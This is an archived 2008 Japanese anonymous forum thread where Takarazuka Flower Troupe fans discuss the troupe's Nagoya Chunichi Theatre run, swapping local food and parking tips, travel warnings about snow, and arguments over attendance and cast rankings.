帰りに松坂屋で天むす買って、新幹線の中で食べました。
>>125タンいかがでしょう

133 :名無しさん@花束いっぱい。:2008/02/04(月) 01:49:20 ID:mZfXTuWc
パーフェクトです(笑)
また名古屋に来てね。待ってるデネ。
新生花組、応援したいものね。125でした。


134 :名無しさん@花束いっぱい。:2008/02/04(月) 02:01:57 ID:Fup5chev
名古屋名物のモーニングを食べに行こうと思ってます。名古屋駅周辺でオススメのお店はありますか?

135 :名無しさん@花束いっぱい。:2008/02/04(月) 06:04:36 ID:iJCKKbJo
夏場なら、名古屋駅近くの、養老軒の夏希氷がオススメなんだが。

136 :名無しさん@花束いっぱい。:2008/02/04(月) 11:40:13 ID:iIgOU6d/
調べたら
出てくるよ。
駅ホテルの一階とサンロード。どちらも割りに良さそう。
私は、ベルヘラルドを利用した事があるけど
新しくパンが出されると
みんな飛びつくように取りに行ってて
落ち着かなかった。
量を食べられないようだったら、普通の喫茶店のモーニングセットで
良いと思う。
穴場は、松坂屋の地下の本屋の辺り。
地下街を中央郵便局方面へ行くと綺麗なトイレもあるし本屋も開いてる。
デパートの開いていない時間帯はここを使うといいよ。

137 :名無しさん@花束いっぱい。:2008/02/04(月) 11:48:38 ID:iIgOU6d/
去年遠征したけど、夜が早い。
午後公演が終わって出待ちしたら
ご飯食べるところがなかったよ。

138 :名無しさん@花束いっぱい。:2008/02/04(月) 19:51:22 ID:RyhOniwQ
>>137
そうですよね。
地下街はどこも夜8時や9時には閉まってるって感じですね。


139 :名無しさん@花束いっぱい。:2008/02/04(月) 20:39:48 ID:mZfXTuWc
こんばんわ。
モーニングなら136さんのおっしゃるとおり、
量ならアソシアホテルの「ジャンシアーヌ」とか
サンロード地下街の「シャポーブラン」。
普通でいいならどこの喫茶店も似たり寄ったりかな。
コーヒーにトースト半切れ、ゆで卵。これで充分。
夜は138さんのおっしゃるとおり、地下街は早く閉まりますが
地上は意外と夜遅くまでやってるお店ありますよ。
表通りより裏通りのほうがにぎやかですが、
それぞれの好みもあるでしょうから、「ぐるなび」などで
お店をピックアップしたほうがいいでしょうね。
長文ごめんなさい。


140 :名無しさん@花束いっぱい。:2008/02/05(火) 02:02:18 ID:+43Zo3Rb
モーニングの件、お答えありがとうございました。
名古屋大好き!久しぶりにナナちゃん人形の股をくぐりたいし
きしめんも食べたいと思っています。


141 :名無しさん@花束いっぱい。:2008/02/05(火) 09:11:36 ID:8J7m5JTs
追記いたします。
アソシアは名古屋駅前はマリオットアソシアとアソシア駅前ターミナルとふたつあります。
モーニングは駅前ターミナルだからね。
マリオットは高いから行ったことないです。
ケーキはめちゃめちゃおいしいらしいけどね。
では〜

142 :名無しさん@花束いっぱい。:2008/02/05(火) 14:50:45 ID:+43Zo3Rb
>141
ありがとう!!

143 :名無しさん@花束いっぱい。:2008/02/05(火) 23:48:00 ID:cqcxyswi
去年の今日、父から中日劇場前の公演看板を撮った写メールが届いた。
あの頃の父は元気そのものだった。

そんな父が突然の病魔に襲われ、治療の甲斐なく11日前に亡くなった。
もう何処を捜しても父は居ない。

中日公演の季節が巡る度、この事を思い出すのだろう。
2月15日 母と、父の写真を手に公演を観に行くことにした。
写真の中の父は大好きだった檀ちゃんとのツーショッとで頬を緩めている…。

144 :名無しさん@花束いっぱい。:2008/02/06(水) 01:47:09 ID:+F3+GQMc
>>143
宝塚がお好きでいらしたのでしょうか、素敵なお父様ですね。
ご冥福をお祈りいたします。


145 :名無しさん@花束いっぱい。:2008/02/09(土) 12:41:56 ID:f45ey9gw
>143さん。
名古屋は雪です。今日の雪は貴女の悲しみを天が慰めようと降らしてくれたのかも。
やがて来る春を思ってゆっくりした気持ちで過ごしてくださいね。

また遠征する方は新幹線の遅れを見越して早めに移動してね。
あっという間にすっごく積もってきたよ。
道路はノロノロ運転で渋滞ちう。だから地下鉄で移動してね。

146 :名無しさん@花束いっぱい。:2008/02/09(土) 22:47:04 ID:gxRKrbhI
今日名古屋大雪みたいだったけど、外で入り出待ちしてる人いた?

147 :名無しさん@花束いっぱい。:2008/02/11(月) 23:01:58 ID:PuS2Cu2D
ショーで客降りのとき通路で踊ってる人下手から順番に教えてください。
前方席だけでいいので。

148 :名無しさん@花束いっぱい。:2008/02/11(月) 23:38:04 ID:bNc7u0NG
娘役さんで雪のとなみちゃんみたいな子がいた。
あの子は誰だろう

149 :名無しさん@花束いっぱい。:2008/02/12(火) 02:15:05 ID:e/Rhfvkb
グルメ情報です
三越のデパ地下に匠とゆーカレー屋があります
高級懐石料理店のまかないから派生したお店
具がないの…すべて手間隙かけて裏ごし!
石○純一オススメの店としてテレビで見て行ってみたら、森光子も常連らしい(懐石の方で食べるらしいけど)
カウンターだしお独り様ドゾー
キハチのソフトクリーム屋もあるし、お一人様オススメコース>三越

隣接のラシックも地下にスープストックやフードコート、パン屋にスーパー、スタバもあって快適ですお

150 :名無しさん@花束いっぱい。:2008/02/12(火) 02:19:41 ID:e/Rhfvkb
深夜に付け足しスマソ
夜が早い名古屋ですが、名駅なら名鉄上階のグルメフロアが夜遅くまでやってる
矢場とんやら名古屋グルメもあるのに空いてて穴場。新幹線も近いし
タワーズやエスカは慢性的に混んでるもんね…
松坂屋上の飲食店も遅くまでやってるよ

151 :名無しさん@花束いっぱい。:2008/02/12(火) 22:02:32 ID:CyToQgx7
貧乏学生が首突っ込みます
すがきやラーメンは安くてうまい
金持ちマダムには勧めませんw

152 :名無しさん@花束いっぱい。:2008/02/12(火) 22:10:59 ID:Twlhnfui
貧乏学生2も首突っ込みます
すがきやラーメンのデザートには
クリームぜんざいをおすすめします
同じくマダムむきではありませんw


153 :名無しさん@花束いっぱい。:2008/02/12(火) 22:53:24 ID:c+2UnRtl
>>148
となみ=まん丸って意味なら
ゆゆちゃんか千桜ちゃんだと思ふw

154 :名無しさん@花束いっぱい。:2008/02/12(火) 23:38:30 ID:4hzl6Hdk
勤労奥様も首突っ込みます
すがきやは名古屋のソウルフードです
名駅ならエスカと松坂屋にあります
マダムには確かにきついw
駅の売店やコンビニにカップ麺があるのでドゾー
ラーメンフォークで食べるのが通!←嘘です。無理

155 :名無しさん@花束いっぱい。:2008/02/13(水) 00:03:33 ID:K6OrYB/6
鶴舞図書館にすがきやがあったから、驚いたよ。。

156 :名無しさん@花束いっぱい。:2008/02/13(水) 00:55:15 ID:rHV7WTdF
すがきやならコーヒーゼリーもうまいよ〜。中にコーンフレークとか入ってるやつ。
ラーメンも、店主がふんぞり返ってるのにたいして旨くないラーメンなんかより
よっぽどおいしい。そして安い。



つか、公演話より食い物の話が多いんですがw

157 :名無しさん@花束いっぱい。:2008/02/13(水) 01:00:11 ID:A+gVhCSN
>>155
最近出来たんだよね

みわっちのフォンダリ最高!
まっつの「一発」がスベルと悲しい

158 :名無しさん@花束いっぱい。:2008/02/13(水) 23:11:42 ID:n8oHJDjp
まっつの「一発」で「イヤン、もっと」と心の中で突っ込む私。
嫁に行けなくなる日も遠くない、そんな私は名古屋嬢〜♪

159 :名無しさん@花束いっぱい。:2008/02/14(木) 00:13:53 ID:++ktN6CY
12時公演見て出待ち、その後新幹線まで2時間くらいは有りそうです。
お土産に手羽先&ういろうを買って、 夕食はどこで何を食べるのがお勧めでしょうか?よろしくお願いします!


160 :名無しさん@花束いっぱい。:2008/02/14(木) 10:16:43 ID:PUwLVbZp
先日の名古屋大雪の日、新幹線はどのくらい遅れたか誰か教えてください。
関が原通るので、観劇日は前夜からどきどきです。

161 :名無しさん@花束いっぱい。:2008/02/15(金) 00:52:22 ID:arMKma+x
>159
2時間しかないなら、お土産買うのも食べるのも名古屋駅でまとめた方が安全かな?
くれぐれも迷子にならないでね。
>160
私がたまたまみたテレビの交通情報では20分程度の遅れでした。
でも積雪量によって変わるから油断しないでね。雪の重みで架線が切れたらもっと遅れるかもしれないもん。
とにかく雪が降らないことを願います。
中日公演も折り返しに差し掛かり、よくなってきましたから楽しんでね。

162 :名無しさん@花束いっぱい。:2008/02/16(土) 16:03:30 ID:3puvpGCa
遠征するんじゃなかった。爆睡!!
嫌いだったけどまとぶ君素敵でした。
娘役さんで白羽さんに似ている人が綺麗でしたが口元がおしい。
ロケットでセンターの娘役さんが地味でした。
桜一花さん顔ちっちゃい!!

163 :名無しさん@花束いっぱい。:2008/02/16(土) 22:37:49 ID:YWSKZ7hT
コメディーで面白いお話だし、個人的にとても好きな
ショーで、今日2回目でした。
名古屋嬢だから、出待ちも数回行ってます。
でも、今日の若手の組子さんの数人が怒った顔で出てきて、
お疲れさまでした。という声にもむっつり顔で反応。

ちょっと…てか、かなり萎えた。

164 :名無しさん@花束いっぱい。:2008/02/16(土) 23:32:32 ID:Dr+7n2dx
怒ってるんじゃなくて、疲れてるんだと思われ。

165 :名無しさん@花束いっぱい。:2008/02/16(土) 23:39:33 ID:TsOS0p7K
ああ、みんな疲れてる頃かあ。
わが贔屓は体調大丈夫かのう。心配…。
もう遠征できないのが悲しいわ。

166 :名無しさん@花束いっぱい。:2008/02/17(日) 01:00:29 ID:PZYbt80K
北陸地方から大雪の中クルマで遠征。
いやぁ生きて帰って来られて本当に良かった…!
片道5時間くらい掛かっちまったけど(通常は2時間45分くらい)楽しい公演でした。
次に名古屋に行くのは赤と黒。楽しみです。

167 :名無しさん@花束いっぱい。:2008/02/17(日) 10:14:49 ID:8jaFKqcR
>166
おいおい、無理すんなよ。大雪の中「80K」かよ。無事で何より。

168 :名無しさん@花束いっぱい。:2008/02/18(月) 17:12:56 ID:wmApy0W6
次の日曜日初めてクルマ遠征します
近くに一日止められる駐車場って
多いですか?

169 :名無しさん@花束いっぱい。:2008/02/18(月) 23:31:28 ID:G9cj8KGo
駐車場ですか?栄界隈はたくさんありますよ。
ただ日曜はすぐ満車になるから、ネットで念入りに調べてね。
値段は1時間600円程度。裏通りならもうコインパークのような少し安い所もあるみたいですね。
また駐車場によっては、デパートで買い物したら無料サービス券出してるところもあるよ。三越松坂屋なら2万円買えば2時間迄無料とかね。(久屋駐車場、エンゼルパーク駐車場)
こんなところかな?

170 :名無しさん@花束いっぱい。:2008/02/19(火) 10:48:20 ID:TBaKypxJ
チケット売れてないのね。
未だに広告載ってるよ。
前売り段階でもう広告載らなくなっていたのにね。

171 :名無しさん@花束いっぱい。:2008/02/19(火) 10:58:54 ID:CtXvmakl
地元名鉄協商の駐車場

ttp://www.mkyosho.co.jp/parking/info/map.php?lng=136.9014072418213&lat=35.17314180743984

172 :名無しさん@花束いっぱい。:2008/02/19(火) 19:24:56 ID:zDlq8HY8
中日ビル脇のタワー駐車場は1日1400円ですよー。
両口屋是清で左折。進行方向右側すぐ。中日ビル駐車場のお向かい。

173 :名無しさん@花束いっぱい。:2008/02/19(火) 20:29:57 ID:Y79bSrA6
こちらのお勧めに従い、名古屋食べまくりツアーしました!

ビックリなものだらけでとても楽しかったです。

名古屋の皆さん有り難うございました。千秋楽は松坂屋ヒツマブシで決まり!

174 :名無しさん@花束いっぱい。:2008/02/20(水) 06:24:27 ID:ub1zbUvR
168です。皆さん

175 :名無しさん@花束いっぱい。:2008/02/20(水) 06:29:44 ID:ub1zbUvR
誤爆orz_| ̄|〇
オマケにあげてしもた…
しかし皆さん、情報有難うございます。
名古屋が好きになりそうだ…

176 :名無しさん@花束いっぱい。:2008/02/20(水) 08:15:36 ID:khKaxghb
>170
だって真飛さんが主役だから…。
トップ〜4番手、みつる、りせを揃えてるのにw

177 :名無しさん@花束いっぱい。:2008/02/20(水) 09:35:50 ID:VpyJuOZJ
>170
中日公演は2月だし、ウン十年間見ていますがお客の入りは大抵こんなもの。
中日のホームページの残席を見ると、新人トップさんにしては
健闘しているほうだと思います。
実は私、もっと入らないと予想してましたw

178 :名無しさん@花束いっぱい。:2008/02/20(水) 12:34:50 ID:6uH7TZmg
中日劇場で初めて花組をみました。
主役の方の美しさにうっとりしました。なんて可愛いの。
でも、ここを拝見していると、まだこれからの方のようですね。

179 :名無しさん@花束いっぱい。:2008/02/20(水) 14:07:02 ID:FzJjXhmo
>176を見て思ったんだが、みつるとめおはどっちが上の番手なの?

180 :名無しさん@花束いっぱい。:2008/02/20(水) 17:20:59 ID:t8hT3Z0K
めおっぽくない?

組替えとか考えて…

てかジゴロ普通によかったよ?

181 :名無しさん@花束いっぱい。:2008/02/20(水) 17:36:58 ID:nmc3KBsV
>>126
ハーブスは関東・東海・関西にある
ttp://www.harbs.co.jp/harbs/

ラシックに入ってるサロン・ド・テ・アンジェリ−ナのモンブラン(現地サイズ)は一見の価値ありだ
(ひとりで食べるなら日本人向けのサイズのほうで)
まあこの店も東京にはあるみたいだけども…


食べてみたい名古屋名物
ミソカツ、ひつまぶし、モーニング、シロノワール、手羽先、どて煮込み、エビフライ、味噌おでん…
羅列するとやっぱり味噌味のが多いかなぁ
全部制覇するには何泊しないといけないんだろうw

182 :名無しさん@花束いっぱい。:2008/02/20(水) 18:02:01 ID:tbZ+H+JF
成績はみつるが上。
だが名前が出たりとかスチルはめおが前
だが大劇見るかきり立ち位置とかはみつる

まあ、いろいろとごまかしてるようで

183 :名無しさん@花束いっぱい。:2008/02/20(水) 18:03:19 ID:GqWzQKLb
一日半位の滞在でしたが、矢場とん、山ちゃんの手羽先、
チャオのスパゲティ、天むすを押さえました。
なかなか頑張りました。情報くれた方々に感謝です。

184 :名無しさん@花束いっぱい。:2008/02/20(水) 19:26:03 ID:AGYQMaC+
>お客の入りは大抵こんなもの
水もあさこももっと入れていたよ。


185 :名無しさん@花束いっぱい。:2008/02/20(水) 20:11:26 ID:ReZASJbD
>水もあさこももっと入れていたよ。

数えたのかよーまったく・・・
いいかげんなこと言わんでくれよ


186 :名無しさん@花束いっぱい。:2008/02/20(水) 20:56:02 ID:6uH7TZmg
184をかばうわけじゃないが本当。
うちの会社、たまに団体観劇があるから中日の営業マン来るんだけど
今年は例年と違ってあまり入ってないので席にこだわらなければ
お取りしますよって言われて、たまには2階から全体観ようかと
平日夜行ったらセンターブロックに団体らしき人達が2列いるだけ。
B席も10人くらいだった・・・

187 :名無しさん@花束いっぱい。:2008/02/20(水) 21:22:17 ID:sBdLxc3V
どうしてもガラガラってことにしたい人がいるね。
平日に3回行ったけど、埋まってたよ。
悲惨な客席を予想してたから驚いた。

188 :名無しさん@花束いっぱい。:2008/02/20(水) 21:26:30 ID:K4AHCOZC
昔話でゴメンですが、中日公演は2週間だったんですよ。
それを思ったら長期公演有り難いなあと思います。
またこの不景気に遠征してくれるのうれしいし、名古屋を好きになってくれたら、地元のファンもうれしいです。
最後まで応援していきたいですよね。
で、スタミナ源は名古屋メシ?

189 :名無しさん@花束いっぱい。:2008/02/20(水) 21:54:47 ID:6uH7TZmg
>187 どうしてもガラガラってことにしたい人がいるね。

私の事?公演は良かったけど2階が空いていたのは事実。
自分の目で見たってか、その場にいたんだもん。
平日夜に見た2回共同じ様な状態だったよ。
3回行った平日って昼じゃないの?
夜でも客席降りがあるから1階は埋まっていたかもだけど
劇場は2階にも客席があるよ。
2階の状態は見てないんじゃないの?

190 :名無しさん@花束いっぱい。:2008/02/20(水) 21:57:15 ID:s27GyCoL
今日行ったけど、昼夜とも盛り上がってたよー。
味噌煮込みうどんを食べたけど、
前掛けして蓋に取って食べるのね。
美味しかった。

191 :名無しさん@花束いっぱい。:2008/02/20(水) 22:08:29 ID:7KgF+huA
台湾ラーメン食べたかったけど夜〜でないとやってなくて残念だった。
今度名古屋で見に行くときは泊まりで行こう!



192 :名無しさん@花束いっぱい。:2008/02/21(木) 00:15:38 ID:Z1YGPfaZ
>189
二階が空いてたらガラガラ認定で桶?
それなら、月のあかねさす―土曜日だったけど空いてたよ。
もちろん1席2席じゃなくて両脇後ろガラガラ。
どの組がやってもガラガラなら、取り立ててガラガラ言う必要ないんじゃね。

193 :名無しさん@花束いっぱい。:2008/02/21(木) 01:06:50 ID:d0Tkol6t
名古屋の劇場は、どこも夜公演は空いているよ。
店が閉まるのも早いし。
女性客が多い宝塚は特に、夜観劇しようって言う地元の人が少ないから。

>>183
頑張りましたねえ。

>>191
台湾ラーメン、本当に辛いよ!
おいしいんだけど。いやほんとに辛い。


194 :名無しさん@花束いっぱい。:2008/02/21(木) 01:40:18 ID:6OwzDKFF
どの組がやってもガラガラって・・・・・orz

花だけ取り立ててガラガラ言うのもナンだけど
花を擁護するために月を引き合いに出すのもイタい

195 :名無しさん@花束いっぱい。:2008/02/21(木) 07:44:09 ID:9+dHjQG+
>中日の営業マン…今年は例年と違ってあまり入ってない。
これホント。

196 :名無しさん@花束いっぱい。:2008/02/21(木) 08:58:41 ID:s1FA3fXr
というか、花組がガラガラだったとして何か問題でもあるの?
チケット取りやすくて逆にいいと思うけど。困るのは中日サイドだけだろうし。
大体まとぶの人気からして、あさこミズより売上げ低いのはわかりきったことだったのでは?
何を今更こんなに騒いでるのかさっぱりわからん。

197 :名無しさん@花束いっぱい。:2008/02/21(木) 10:18:46 ID:HfxrsUM3
ガラガラだろうが
好きだからまた見に行くぉふらーっと行って
当日券で観たっていいやん

198 :名無しさん@花束いっぱい。:2008/02/21(木) 10:55:21 ID:D16wkXvQ
つうか、別にガラガラって程じゃないし。
宝塚ファンって前売り完売、満席じゃないとガラガラっていうのなw
印象操作したいのか。

199 :名無しさん@花束いっぱい。:2008/02/21(木) 12:51:10 ID:SMlzjkTv
土曜の夜公演、2階ギッシリ満員だったよ。
ガラガラ認定すんなや(ノ`д´)ノ┻━┻

200 :名無しさん@花束いっぱい。:2008/02/21(木) 12:51:12 ID:J7INJzyS
てか・・・・2、3番手時代が全然ないマトブと同レベルの動員だったら水アサコまずいでしょ。
特に水は2番手キャリアも3番手キャリアもマトブの2倍以上。
新規獲得に強いベルばらを主要な役で3回も経験。
(特出いれたら4回)
大差つけれて普通だし、近差だったら水どんだけ〜?て話だよ。


201 :名無しさん@花束いっぱい。:2008/02/21(木) 14:31:09 ID:A/aYAMzI
>199
その日はお茶会があった日でしょ。
日によって入りにばらつきあるのは何処も似たり寄ったりでは?

202 :名無しさん@花束いっぱい。:2008/02/21(木) 14:59:09 ID:Z1YGPfaZ
ついでに書いとくと、自分が観た、2階に空席があった土曜日の月組公演はアサコの茶会日だった。

203 :名無しさん@花束いっぱい。:2008/02/21(木) 15:06:00 ID:YC7/iNhB
>200
ミズはただベルばらは大劇場で主演はできなかったんだよね。
オスカルも中途半端だったし(オスカル役者じゃないと思った)
ベルばらで新規ファン獲得なんてできないでしょ。

204 :名無しさん@花束いっぱい。:2008/02/21(木) 17:23:13 ID:DiIlQmHt
あのたかこさんの「望郷〜」の時もガラガラ・・・
やはり新聞社関係の人から(二階席だったが)
何枚でも良いから タダであげるよ!!と声がかかった。
(一応)お披露目の時はこんなもんだわ。

205 :名無しさん@花束いっぱい。:2008/02/21(木) 17:36:24 ID:J7INJzyS
>203
ヤンもシメも当時トップじゃないし主演じゃなけど、そして大劇通しでやれてないけどブレイクしたよ。
ヤンにいたってはトップどころか2番手でもなくミキとW3番手のミキ優遇状態。
大劇単独なんかでやってません。
けどヤンファン曰く、このオスカルのおかげでなれなかったはずのトップになれた。
シメも星大劇中は海外公演かなんかで・・・東京だけのはず。
あとその後、花の大劇特出したのかな?そんなもん。
オスカルだけじゃなくアンドレもやってるんだし、オスカルとアンドレをあれだけの日数やれたんなら十分でしょ。
トップでフェルゼンやったらブレイクするってわけでもないから、大劇で主演かどうか、それで人気でる出ないは関係ないと思う。




206 :名無しさん@花束いっぱい。:2008/02/21(木) 17:43:54 ID:rB3uj279
そんなにガラガラか?


黎明に比べたら断然入ってる…

207 :名無しさん@花束いっぱい。:2008/02/21(木) 17:44:40 ID:fXAT+RoZ
横レスだけど。
ヤンさん自身も、オスカルのおかげでトップになれたと言ってた。
オスカルでブレイクしなかったら、ルコさん→ミキちゃんだったのかなあ。

ヤンオスカルは凄かった、神がかってた。
でも予感はあったよね、ファンでも無い私が、ヤンオスカル観に星大劇場遠征したもの。




208 :名無しさん@花束いっぱい。:2008/02/21(木) 23:21:54 ID:6OwzDKFF
>204
どさくさでウソはいかん。
他の公演と違って宝塚公演は誰の時でも招待券を一切出さない。
しかも新聞社の人ってことはない。
本社や関連がいくらでもタダであげるなんて言えるほど
チケットに関して権限は無い。

209 :名無しさん@花束いっぱい。:2008/02/21(木) 23:51:55 ID:buZFVcha
中日新聞の持ち分の招待券、あるにはあるらしいが枚数的にすごく少ないから、
ホントに中日新聞のお得意様に渡す分しかないと言われたよ。
だから本社内でも配れるほど招待券がないんだと思う。

210 :名無しさん@花束いっぱい。:2008/02/22(金) 00:15:27 ID:tCY+OF5e
>>201
土曜日にお茶会があったのはまっつだけなんだが・・・なんで決め付けるんだ?

211 :名無しさん@花束いっぱい。:2008/02/22(金) 00:28:04 ID:B7KvMADD
>209
どこから聞いた話?
宝塚公演で新聞社の持ち分の招待券なんて存在しない。
新聞のお得意様に配るなんてありえない。
本社上層部が大切な取引会社の上の方から頼まれたから、
何て場合に支配人に特別に依頼をしてようやく2枚なんて程度だよ。

これ以上事情を書くと家族に怒られるからw消えま〜すノシ

212 :名無しさん@花束いっぱい。:2008/02/22(金) 09:34:01 ID:f5Ud0Od5
1列目とはいえオクで30000円・・・・。
客席も2階までほどほどうまってる。
これくらいが一応の面目も保てて、チケットもゲット可能で調度いいんだが・・・
次回からはユウヒも来るし・・・。
これ以上人気でちゃうとチケットとりづらくなりそうで心配・・・。



213 :名無しさん@花束いっぱい。:2008/02/22(金) 13:41:59 ID:6tET8joo
>>211
209だけど、家族が仕事で本社に出入りしてて、新聞社と上下というより対等な関係。
だから、お得意様に配る分しかなく、枚数ないから無理ってあっさり言われたらしい。

214 :名無しさん@花束いっぱい。:2008/02/22(金) 15:05:22 ID:AoxmhrKM
>212
強きな花組ファンだことww
人気がでたとしても、それはユウヒのおかげ。
マトブトップでは客が入らないと劇団がとった苦肉の策。
情けなや花組トップwww

215 :名無しさん@花束いっぱい。:2008/02/22(金) 16:37:50 ID:9ABPCBNR
>214
そんなあなたは何組ファン?

それだけ偉そうに言うなら堂々とうちあけられるよね。
さあ告白どうぞ。

216 :名無しさん@花束いっぱい。:2008/02/22(金) 16:42:23 ID:U7SJq9vN
社員の私も読んでますよ

217 :名無しさん@花束いっぱい。:2008/02/22(金) 16:50:26 ID:e2ydONFe
中日新聞も、持分のチケットはあるが、チケット代は個人持ちだぞ。
引き換え券出してもらって、劇場で引き換えだわ。
席は悪くは無いが・・・

218 :名無しさん@花束いっぱい。:2008/02/22(金) 18:02:06 ID:wNwqS/yB
公演を観て自分が楽しければ後のことはどうでもいい。
毎年楽しみにしてる中日公演。今年も楽しかった!

219 :名無しさん@花束いっぱい。:2008/02/23(土) 14:17:11 ID:GsgVR6a2
新聞社関係うそじゃないもん
望郷〜の時は たかこさんトップになったばかりで
平日は二階席 がらがらなんで何枚でもいいよって
言われたもん。
でも、チケットは和央の会でチケットもらったなあ・・・

220 :名無しさん@花束いっぱい。:2008/02/23(土) 16:19:40 ID:61RlYI3F
望郷〜じゃないときも、何だったか忘れたけど私も和央の会でチケット
もらったよ。とある人の紹介で。219はその紹介者がたまたま新聞社関係の人
だっただけだと思うよ。ちなみに宝塚大劇場でも新聞社関係の人に頼むと
良席を押さえてくれるよ。費用は自分もちだけどね。

中日、よかったよ。
トップは初々しくて可愛くて、若手にいたるまで組がひとつになって。
次への期待でワクワクして帰ってきた。

221 :名無しさん@花束いっぱい。:2008/02/23(土) 17:45:09 ID:Et7x4pAK
本日、オサ会の東会と西会のスタッフがたくさんそろってご観劇。
代表までいたのでオサさんも来るのかとそわそわしてしまったよ。


222 :名無しさん@花束いっぱい。:2008/02/23(土) 19:17:06 ID:kowsdyS5
そんなんで来なかったの?
それ、来るはずだったんじゃないのか。



223 :名無しさん@花束いっぱい。:2008/02/23(土) 20:16:58 ID:9JWmxCIl
たぶんFCのスタッフの慰安かねた親睦会なんじゃね。
そんな派手なとこにこないでしょ、本人。

224 :名無しさん@花束いっぱい。:2008/02/23(土) 21:52:46 ID:sFXs0Lcp
でも、嬉しいなあ。
わざわざ名古屋まで揃って
来てくれるなんて〜

225 :名無しさん@花束いっぱい。:2008/02/24(日) 14:16:25 ID:/EvdegGg
お、私も見たよ。東西のオサ会スタッフ。
客席のあちこちに座ってたね。
嬉しくてちょっと感動した。

226 :名無しさん@花束いっぱい。:2008/02/25(月) 01:21:12 ID:zyQO/6xG
最後に良い話だな〜。ほのぼのする。
千秋楽につき、age

227 :名無しさん@花束いっぱい。:2008/02/25(月) 01:43:11 ID:LMEIQdQl
オサ会スタッフは今でも仲良しこよしで花組だけでなく様々なところに出没しているよ。
贔屓が退団して本来の宝塚を楽しむスタイルになったってわけか。
って、そのうち誰かに揃って付きそうだけどねw

228 :名無しさん@花束いっぱい。:2008/02/25(月) 02:19:42 ID:CpEGcVnF
仲良さげだよね。大劇でも何度見かけた。
ってスレチだな、スマソ。

229 :名無しさん@花束いっぱい。:2008/02/26(火) 00:28:50 ID:V8K1ipxl
中日公演終わったね
私は地元なのに三回しか見に行くことができなかった。
でも初日間もない時はなんとなくチグハグな台詞運びも一週間、二週間経つごとにリズミカルでなっていって楽しかった。
生徒みんなが一つになってまとめあげようとする意気込みが伝わったから。
バウ組も多分、自分達をより成長させようと頑張っていると思うから、全員揃う次の公演が楽しみです。
そして遠征されたファンの方々、、都会のような田舎のようなちょっとピントがずれてる名古屋を少しでも好きになってくれたら地元ファンはうれしいです。
花組の皆さん、ファンの皆さんありがとうございました。

230 :名無しさん@花束いっぱい。:2008/02/27(水) 20:44:04 ID:72falsrq
また、来年ノシ

231 :名無しさん@花束いっぱい。:2008/02/29(金) 14:46:18 ID:IbPMHnC/
名古屋グルメの情報落としてくださった方、ありがとうございました。
お陰さまで一人遠征でも食にも困らず、生徒に差し入れすることも出来ました。
来年は宙ですが、友人に付き合って遠征する予定です。
また来年同じくノシ

232 :名無しさん@花束いっぱい。:2008/06/21(土) 18:49:52 ID:utku+Dwq


233 :名無しさん@花束いっぱい。:2008/06/23(月) 18:04:53 ID:yjT1wnLp
教えて下さい、二階最前列の端席あたりのは、カーブになっていますか?見にくいですか?

234 :名無しさん@花束いっぱい。:2008/08/01(金) 04:25:58 ID:/NWUwkLP
さあ

235 :名無しさん@花束いっぱい。:2008/08/01(金) 11:51:26 ID:e89Mz4U0
>>233
両端はバルコニーのように突き出してるから、あんがい観やすいよ。

236 :名無しさん@花束いっぱい。:2008/08/16(土) 13:07:31 ID:OD3M2GGm
( ● ´ ∇ ` ● )

237 :名無しさん@花束いっぱい。:2008/08/18(月) 01:46:34 ID:LMe2w/Ju
どしたの?かなみん

55 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)